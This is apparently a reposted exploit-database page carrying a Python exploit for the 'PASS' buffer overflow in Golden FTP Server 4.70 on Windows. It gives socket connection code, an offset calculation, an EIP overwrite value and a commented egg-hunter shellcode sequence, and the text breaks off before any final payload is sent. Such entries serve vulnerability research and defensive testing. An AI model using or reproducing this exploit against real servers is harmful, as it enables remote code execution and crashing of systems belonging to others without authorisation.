Golden ftp server 4.70 pass buffer overflow (2) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-03-09 |
Type : remote |
Platform : windows
This exploit / vulnerability Golden ftp server 4.70 pass buffer overflow (2) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)
# Author: 1F98D
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on Windows 10 (x64)
#
# A buffer overflow exists in GoldenFTP during the authentication process.
# Note that the source ip address of the user performing the authentication
# forms part of the buffer and as such must be accounted for when calculating
# the appropriate offset. It should also be noted that the exploit is
# rather unstable and if exploitation fails, GoldenFTP will be left in
# a state where it will still accept connections, but it will be unable
# to handle or process them in anyway, so be careful.
#
#!/usr/local/bin/python3
from socket import *
import sys
# Your address forms part of the buffer length calculation
SOURCE = '192.168.1.1'
TARGET = '192.168.1.2'
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 21))
total_length = 545-len(SOURCE)
eip = b'\x7f\x79\x4c\x00'
hunter = b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset base on source ip
hunter += b'\xfd' # std ; set df flag so we search high to low
hunter += b'\xb8\x43\x42\x41\x40' # mov eax, 0x40414243 ; egg
hunter += b'\x89\xF7' # mov edi, esi ; start searching from esi
hunter += b'\x47' # inc edi
hunter += b'\x90' # nop
hunter += b'\x83\xC7\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1
hunter += b'\xaf' # scasd ; check for egg at edi
hunter += b'\x75\xfa' # short jnz -0x6 ; jump back to add edi, 0x3
hunter += b'\x83\xC7\x03' # add edi, 0x3
hunter += b'\xaf' # scasd
hunter += b'\x75\xfa' # short jnz -0x6
hunter += b'\x83\xC7\x1f' # add edi, 0x1f ; account for egg hunter
hunter += b'\xff\xe7' # jmp edi ; egg found, let's go!
hunter += b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset again